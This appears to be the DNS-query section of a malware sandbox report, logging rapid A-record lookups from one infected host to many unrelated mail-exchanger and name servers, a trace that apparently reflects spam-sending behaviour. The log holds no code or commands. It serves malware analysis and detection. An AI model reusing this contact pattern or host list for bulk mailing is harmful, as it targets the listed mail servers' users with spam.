                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.706821918 CEST192.168.2.31.1.1.10xc89aStandard query (0)ns-547.awsdns-04.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.767647028 CEST192.168.2.31.1.1.10x2c6dStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.874572039 CEST192.168.2.3205.251.194.350xbdd0Standard query (0)mx37.mb5p.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.877182007 CEST192.168.2.3148.163.128.500xbdd0Standard query (0)mxa-00752701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.878245115 CEST192.168.2.3217.69.139.1120xbdd0Standard query (0)mxs.my.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.879780054 CEST192.168.2.3185.159.196.20xbdd0Standard query (0)filter18532.zerospam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.881098032 CEST192.168.2.364.98.148.1370xbdd0Standard query (0)mx.blog-galaxy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.882478952 CEST192.168.2.3170.55.6.30xbdd0Standard query (0)mail.harlandale.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.885670900 CEST192.168.2.31.1.1.10xbd6dStandard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.888689995 CEST192.168.2.3192.252.144.350xb1d2Standard query (0)mail.bulldognews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.890141964 CEST192.168.2.3148.163.128.500xb1d2Standard query (0)mxa-00220401.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.891870975 CEST192.168.2.31.1.1.10x1b11Standard query (0)ns1a.btitalia.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.145190954 CEST192.168.2.31.1.1.10x3439Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.469460964 CEST192.168.2.31.1.1.10xbf37Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.531582117 CEST192.168.2.3217.220.57.1310xc522Standard query (0)mail.4uservizi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.533128023 CEST192.168.2.397.74.104.450xc522Standard query (0)mail.tspl-india.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.533132076 CEST192.168.2.374.124.210.2420xc522Standard query (0)juliemusic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.535933018 CEST192.168.2.3204.61.216.1050xc522Standard query (0)mail2.mota-engil.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.535934925 CEST192.168.2.31.1.1.10x6e3Standard query (0)slns1.namespro.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.701920033 CEST192.168.2.3193.0.14.1290xc4d3Standard query (0)mail.b-io.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.701921940 CEST192.168.2.367.228.254.40xcc8Standard query (0)bc.dmgarch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.717175007 CEST192.168.2.3108.162.192.590x745aStandard query (0)_dc-mx.70705847217d.antiochgolfclub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.717894077 CEST192.168.2.364.98.148.1370x5362Standard query (0)mx.livejournali.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.718898058 CEST192.168.2.3130.59.31.410xb6eStandard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.720174074 CEST192.168.2.3195.29.150.30xcf77Standard query (0)mx01.t-com.hrA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.722040892 CEST192.168.2.3192.12.94.300x8783Standard query (0)ny4.inquirymailer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.722042084 CEST192.168.2.3199.249.113.10x578bStandard query (0)mail.wido.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.724747896 CEST192.168.2.3148.163.128.500xa3a8Standard query (0)mxb-00013f02.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.724747896 CEST192.168.2.3162.159.24.1980xeb9cStandard query (0)optimagroupinc.com.2.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.727652073 CEST192.168.2.3150.214.5.830x73b0Standard query (0)buzon.us.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.733176947 CEST192.168.2.3162.159.24.1980xa325Standard query (0)aqua--aerobic-com.mx1.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.733515024 CEST192.168.2.31.1.1.10xee3cStandard query (0)dns01.manitu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.052387953 CEST192.168.2.3217.11.48.2000xa3e3Standard query (0)mail.lieblingslied-records.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.053901911 CEST192.168.2.3104.47.118.1450x8be7Standard query (0)dgaccountants-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.055553913 CEST192.168.2.3104.47.118.1450x4ff1Standard query (0)sabrain-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.056869984 CEST192.168.2.3192.31.80.300x2bf7Standard query (0)smtp6.hamilton.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.058311939 CEST192.168.2.3192.31.80.300xfbfeStandard query (0)gpmx01.1dial.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.059534073 CEST192.168.2.3137.118.1.280xcb06Standard query (0)evertek-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.060775995 CEST192.168.2.3192.31.80.300xbf08Standard query (0)ussf54.upstreamsecurity.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.061822891 CEST192.168.2.350.31.146.1590xc30aStandard query (0)vizi0n.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.075767040 CEST192.168.2.3207.55.253.50xdfacStandard query (0)icandi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.077585936 CEST192.168.2.3192.12.94.300xcbb2Standard query (0)mx01.cloud.vadesecure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.079602003 CEST192.168.2.3148.163.128.500x9bbaStandard query (0)mxa-00137005.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.080720901 CEST192.168.2.370.39.150.20x83beStandard query (0)correiaecorreia.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.082364082 CEST192.168.2.3104.47.118.1450x6bc2Standard query (0)doublea1991-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.084369898 CEST192.168.2.3104.47.118.1450x47c8Standard query (0)hlag-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.091891050 CEST192.168.2.3192.31.80.300x7314Standard query (0)ex1.ypcnet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.093405962 CEST192.168.2.31.1.1.10x2265Standard query (0)ns4754.eukns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.412623882 CEST192.168.2.3158.255.46.1560xf329Standard query (0)plumlogo.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.413846970 CEST192.168.2.3192.12.94.300xe72bStandard query (0)ny4.inquirymailer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.414223909 CEST192.168.2.31.1.1.10x6bc1Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.415582895 CEST192.168.2.3104.47.118.1450xdb2dStandard query (0)littlebrown-co-uk.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.417270899 CEST192.168.2.31.1.1.10x64b3Standard query (0)use1.akam.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.584440947 CEST192.168.2.372.246.46.640xeba6Standard query (0)mx1.hc741-6.eu.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.585774899 CEST192.168.2.3209.191.199.720xeba6Standard query (0)filtermx10.paulbunyan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.587882042 CEST192.168.2.3104.47.118.1450xeba6Standard query (0)fsrinc-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.591264009 CEST192.168.2.3192.12.94.300xeba6Standard query (0)eforward1.registrar-servers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.592825890 CEST192.168.2.3148.163.128.500xeba6Standard query (0)mxb-00168f01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.607920885 CEST192.168.2.385.115.52.1900x8a0cStandard query (0)cust60576-1.in.mailcontrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.609654903 CEST192.168.2.3185.128.227.1700x8a0cStandard query (0)nusantaramotor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.611766100 CEST192.168.2.31.1.1.10xd9ecStandard query (0)dns2.iper.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.809887886 CEST192.168.2.31.1.1.10x8981Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:01.943084002 CEST192.168.2.31.1.1.10x9b96Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.054380894 CEST192.168.2.394.236.27.1070xd732Standard query (0)mail.riminireservation.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.054385900 CEST192.168.2.3205.251.193.440xd732Standard query (0)em4.rejecthost.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.057179928 CEST192.168.2.3104.47.118.1450xd732Standard query (0)rxlps-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.057180882 CEST192.168.2.3192.252.149.150xd732Standard query (0)mail.antares-design.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.058068991 CEST192.168.2.3148.163.128.500xd732Standard query (0)mxa-002ece01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.059833050 CEST192.168.2.3190.228.29.450xd732Standard query (0)mx4.lectotum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.065184116 CEST192.168.2.31.1.1.10x414dStandard query (0)chad.ns.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.230156898 CEST192.168.2.3108.162.193.820xbb1dStandard query (0)mail.i3p.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.248727083 CEST192.168.2.3192.12.94.300xd3e6Standard query (0)mail.bluetie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.249222040 CEST192.168.2.3206.51.128.550xa6f0Standard query (0)mail.nktelco.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251563072 CEST192.168.2.3217.160.82.320xa6f0Standard query (0)getlostxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.251564980 CEST192.168.2.3104.47.118.1450xa6f0Standard query (0)ovam-be.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.252429962 CEST192.168.2.3192.12.94.300xa6f0Standard query (0)mail1.samry.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.253993988 CEST192.168.2.3192.12.94.300x8ef4Standard query (0)antispam.hanafn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.254720926 CEST192.168.2.3148.163.128.500x6afaStandard query (0)mxb-0019f502.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.257189989 CEST192.168.2.3104.47.118.1450x2206Standard query (0)buildness-pt.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.264362097 CEST192.168.2.3192.12.94.300xeb0Standard query (0)mx3.planet-work.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.264364958 CEST192.168.2.3205.251.192.1870x56a4Standard query (0)mx1.veeam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.269175053 CEST192.168.2.31.1.1.10x5f6Standard query (0)ns1.reg.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.607254028 CEST192.168.2.31.1.1.10x2906Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.617427111 CEST192.168.2.3176.99.13.110xb270Standard query (0)mail.gtdel.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.618767023 CEST192.168.2.3104.47.118.1450x5280Standard query (0)scicom-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.621201038 CEST192.168.2.31.1.1.10x37ddStandard query (0)ns1.iserv.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.703669071 CEST192.168.2.31.1.1.10x6452Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.837196112 CEST192.168.2.31.1.1.10xd903Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:02.934567928 CEST192.168.2.31.1.1.10x9822Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.097722054 CEST192.168.2.3116.202.2.2190x8aa7Standard query (0)gybond.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.098959923 CEST192.168.2.3192.12.94.300x66adStandard query (0)mailgw6.gtinvest.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.100270987 CEST192.168.2.3194.69.254.10x42b3Standard query (0)smtp.sarenet.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.101229906 CEST192.168.2.3192.12.94.300x36b5Standard query (0)ny4.inquirymailer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.102737904 CEST192.168.2.3198.41.0.40x1eb9Standard query (0)drugys.serveriai.ltA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.108860016 CEST192.168.2.3162.159.24.1980x22e2Standard query (0)icci.us.1.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.109926939 CEST192.168.2.354.85.148.1740x26e4Standard query (0)tcmri.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.111546040 CEST192.168.2.31.1.1.10x8c0aStandard query (0)ns1.terrakom.hrA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.232012987 CEST192.168.2.31.1.1.10xf11eStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.289020061 CEST192.168.2.31.1.1.10xd6fcStandard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.406445980 CEST192.168.2.3176.62.8.30x7326Standard query (0)mail.clubadriatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.407660007 CEST192.168.2.3192.12.94.300x7326Standard query (0)mx1-us1.ppe-hosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.409904957 CEST192.168.2.3104.47.38.80x5b2aStandard query (0)web-com.mail.eo.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.412060022 CEST192.168.2.3104.47.118.1450x2b32Standard query (0)burke-org.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.458784103 CEST192.168.2.31.1.1.10x6027Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.733900070 CEST192.168.2.31.1.1.10xec97Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:03.830007076 CEST192.168.2.31.1.1.10xadc9Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.291871071 CEST192.168.2.31.1.1.10xa3a3Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.297199011 CEST192.168.2.31.1.1.10xbc97Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.299307108 CEST192.168.2.31.1.1.10x7818Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:04.329807997 CEST192.168.2.31.1.1.10xc0c9Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.363244057 CEST192.168.2.31.1.1.10xb82eStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.667804003 CEST192.168.2.31.1.1.10x9323Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.708245993 CEST192.168.2.31.1.1.10x2d4fStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.786734104 CEST192.168.2.31.1.1.10x17d9Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.833192110 CEST192.168.2.31.1.1.10x816fStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:05.903202057 CEST192.168.2.31.1.1.10xd3a8Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.123080015 CEST192.168.2.31.1.1.10x67b8Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.181176901 CEST192.168.2.31.1.1.10xb796Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.419018984 CEST192.168.2.31.1.1.10xdec5Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.581182003 CEST192.168.2.31.1.1.10x3a1cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.645175934 CEST192.168.2.31.1.1.10xe8fdStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.733177900 CEST192.168.2.31.1.1.10xab51Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:06.843923092 CEST192.168.2.31.1.1.10x2f11Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:07.337177038 CEST192.168.2.31.1.1.10xd53eStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:07.575429916 CEST192.168.2.31.1.1.10x3a1cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:07.750545979 CEST192.168.2.31.1.1.10xbfdeStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.034665108 CEST192.168.2.31.1.1.10x3145Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.048964024 CEST192.168.2.31.1.1.10xc97fStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.577178001 CEST192.168.2.31.1.1.10x3a1cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.833174944 CEST192.168.2.31.1.1.10xacb2Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.969285965 CEST192.168.2.31.1.1.10x9835Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:08.999787092 CEST192.168.2.31.1.1.10x4a8bStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:09.029192924 CEST192.168.2.31.1.1.10xec29Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:09.638667107 CEST192.168.2.31.1.1.10x57e5Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.032434940 CEST192.168.2.31.1.1.10xee0eStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.047513008 CEST192.168.2.31.1.1.10x4c46Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.125593901 CEST192.168.2.31.1.1.10x84fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.161168098 CEST192.168.2.31.1.1.10xb39aStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.357163906 CEST192.168.2.31.1.1.10xf5fStandard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.518567085 CEST192.168.2.31.1.1.10x2bcbStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.637765884 CEST192.168.2.31.1.1.10x4d96Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:10.672274113 CEST192.168.2.31.1.1.10xb064Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:11.091296911 CEST192.168.2.31.1.1.10x6624Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:11.122164965 CEST192.168.2.31.1.1.10x84fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:11.363009930 CEST192.168.2.31.1.1.10xba10Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:11.445740938 CEST192.168.2.31.1.1.10x5c44Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:12.145159960 CEST192.168.2.31.1.1.10x84fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:12.286195993 CEST192.168.2.31.1.1.10x153fStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:12.593163013 CEST192.168.2.31.1.1.10x6878Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:12.978758097 CEST192.168.2.31.1.1.10x6de8Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:13.081254959 CEST192.168.2.31.1.1.10x5b69Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:13.087184906 CEST192.168.2.31.1.1.10x5083Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:13.576551914 CEST192.168.2.31.1.1.10xbd05Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:13.869472980 CEST192.168.2.31.1.1.10x5a39Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.071214914 CEST192.168.2.31.1.1.10x2c43Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.158792973 CEST192.168.2.31.1.1.10x84fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.188105106 CEST192.168.2.31.1.1.10xf904Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.450402975 CEST192.168.2.31.1.1.10x44c0Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.450933933 CEST192.168.2.31.1.1.10x9b23Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.561203003 CEST192.168.2.31.1.1.10xec10Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.726043940 CEST192.168.2.31.1.1.10x4f75Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:14.731400967 CEST192.168.2.31.1.1.10x4151Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.005170107 CEST192.168.2.31.1.1.10x10cStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.029174089 CEST192.168.2.31.1.1.10xef77Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.095729113 CEST192.168.2.31.1.1.10xde28Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.632110119 CEST192.168.2.31.1.1.10x9bf0Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:15.840806007 CEST192.168.2.31.1.1.10x485Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:16.019947052 CEST192.168.2.31.1.1.10xf0e9Standard query (0)hamaker.netA (IP address)IN (0x0001)false
